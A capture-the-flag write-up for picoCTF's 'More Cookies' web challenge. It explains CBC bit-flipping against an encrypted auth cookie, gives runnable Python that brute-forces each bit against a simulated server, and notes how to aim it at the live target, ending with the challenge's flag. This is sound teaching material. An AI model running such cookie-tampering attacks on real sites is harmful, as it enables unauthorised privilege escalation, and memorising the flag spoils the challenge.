# More Cookies

## Problem

> I forgot Cookies can Be modified Client-side, so now I decided to encrypt them! <http://mercury.picoctf.net:15614/>

## Solution

1. This is a continuation of the "Cookies" challenge, which I did not write up since it is very simple. However, this challenge is fairly difficult despite the point value.
2. There is a cookie called `auth_name` with the value `eEozQmFzQUNUL2Y1c1hIWmZTOEl4OS9wcUwyRkMyVVE4MUdseEZRYnZWU1E3WXRoOHU5cjkwOXpGM3hwTVc4SGx5K1BNbGdBaFhUOFpXWWpCMTl6dE1QNlNzUGJOVTRpeGdSSnA5dDI2ODBXRXVBMkhpWUtWVVBTNmh6RnJGNXE=`. Decoding this as base64 using [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64\('A-Za-z0-9%2B/%3D',true\)\&input=ZUVvelFtRnpRVU5VTDJZMWMxaElXbVpUT0VsNE9TOXdjVXd5UmtNeVZWRTRNVWRzZUVaUlluWldVMUUzV1hSb09IVTVjamt3T1hwR00zaHdUVmM0U0d4NUsxQk5iR2RCYUZoVU9GcFhXV3BDTVRsNmRFMVFObE56VUdKT1ZUUnBlR2RTU25BNWRESTJPREJYUlhWQk1raHBXVXRXVlZCVE5taDZSbkpHTlhFPQ) yields what looks like a second base64 string (it starts `xJ3BasACT/f5...`); decoding that layer as well leaves binary gibberish, which is expected because the cookie is encrypted, as the challenge description says.
3. The letters `C`, `B`, and `C` are capitalized in the challenge description ("Cookies can Be modified Client-side"), which hints that [cipher block chaining (CBC)](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_block_chaining_\(CBC\)) is used. CBC without a MAC is malleable: each plaintext block is recovered as `P[i] = D(C[i]) XOR C[i-1]`, with the IV standing in for `C[0]`, so flipping bit `k` of ciphertext block `C[i-1]` flips bit `k` of plaintext block `P[i]` (and turns `P[i-1]` into garbage, because `D(C[i-1])` changes completely); a flip in the IV changes `P[1]` with no collateral damage. This [answer on the Crypto StackExchange](https://crypto.stackexchange.com/a/66086) explains the attack in depth. Presumably a single bit of the plaintext decides whether the user is an admin, for example a field like `admin=0` that becomes `admin=1` once the right bit is flipped. The position of that bit is unknown, so we can try every position until we get the flag.
4. Outdated (see step 5 for the improved method): ~~We wrote a Python~~ [~~script~~](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/More%20Cookies/script.py) ~~to carry out this brute-force attack. I originally only tried the first 10 positions, which was enough to get the flag, so I left the maximum number of positions to try at 10.~~
5. We write an [improved Python script (`improved_script.py`)](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/More%20Cookies/improved_script.py) to carry out the brute-force attack. The script loops over every bit of the cookie, flips it, and resubmits the cookie until the flag is shown. See the comments in the script for more details.
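The mechanism from step 3 and the brute force from step 5, as an added example that runs offline. This is not the writeup's script or the challenge's server code: the toy Feistel block cipher, the simulated server with its key and IV handling, the placeholder flag and the plaintext layout `admin=0;user=guest` are all assumptions made so the attack can be demonstrated without a network, since the real server's cipher and cookie format are not known. Against the live target, `local_oracle` is swapped for a function that sends the candidate `auth_name` cookie and returns the response body.

```python
"""CBC bit-flipping brute force against an encrypted cookie, run offline.

Added example; the cipher, server, key/IV handling and cookie layout below are
assumptions, not the picoCTF challenge's real code.
"""
import base64
import hashlib
import os
from typing import Callable, Optional, Tuple

BLOCK = 16
FLAG = "picoCTF{placeholder_flag_for_the_simulation}"  # constructed, not the real flag


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- Toy 128-bit block cipher: 4-round Feistel network keyed via SHA-256 ----
# It stands in for AES only so the example needs no third-party package. The
# bit-flip property exploited below comes from CBC chaining, not the cipher.

def _round(key: bytes, r: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):  # undo the rounds in reverse order
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


# --- CBC mode with PKCS#7 padding, IV prepended to the ciphertext ------------

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    padded = pad(plaintext)
    prev, out = iv, [iv]
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    if len(data) < 2 * BLOCK or len(data) % BLOCK:
        raise ValueError("bad length")
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    # P[i] = D(C[i]) XOR C[i-1]: a bit flipped in C[i-1] reappears in P[i].
    plain = b"".join(_xor(block_decrypt(key, c), prev)
                     for prev, c in zip(blocks, blocks[1:]))
    return unpad(plain)


# --- Simulated server (assumed behaviour, constructed for this example) ------
SERVER_KEY = os.urandom(16)


def issue_cookie() -> str:
    """The auth_name cookie a normal login would hand out (assumed layout)."""
    token = cbc_encrypt(SERVER_KEY, os.urandom(BLOCK), b"admin=0;user=guest")
    return base64.b64encode(token).decode()


def local_oracle(cookie: str) -> str:
    """Stand-in for the HTTP request: decrypts the cookie, shows the flag to admins."""
    try:
        plain = cbc_decrypt(SERVER_KEY, base64.b64decode(cookie))
    except ValueError:  # covers bad base64, bad length and bad padding
        return "invalid cookie"
    return FLAG if plain.startswith(b"admin=1") else "not admin"


# --- The attack: one request per bit of the decoded cookie ------------------

def flip_bit(data: bytes, bit: int) -> bytes:
    """Flips bit `bit` (numbered LSB-first within each byte) of `data`."""
    out = bytearray(data)
    out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)


def bitflip_bruteforce(cookie: str, oracle: Callable[[str], str],
                       marker: str = "picoCTF") -> Optional[Tuple[int, str]]:
    """Flips every bit of the decoded cookie in turn; returns (bit, body) on success."""
    raw = base64.b64decode(cookie)
    for bit in range(len(raw) * 8):
        body = oracle(base64.b64encode(flip_bit(raw, bit)).decode())
        if marker in body:
            return bit, body
    return None


if __name__ == "__main__":
    # With the assumed layout the first hit is bit 48: byte 6 of the IV, which
    # lands on the '0' of admin=0 in the first plaintext block.
    print(bitflip_bruteforce(issue_cookie(), local_oracle))
```

Against the real target the oracle becomes something like `requests.get(url, cookies={"auth_name": candidate}).text`, and if the cookie carries more than one base64 layer, strip all of them before flipping and re-apply them in the same order when re-encoding, since flipping bits inside base64 text mostly produces characters the decoder rejects. The success marker can be anything that only appears on the admin page; the flag prefix is the obvious choice here.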

### Flag

`picoCTF{cO0ki3s_yum_a9a19fa6}`
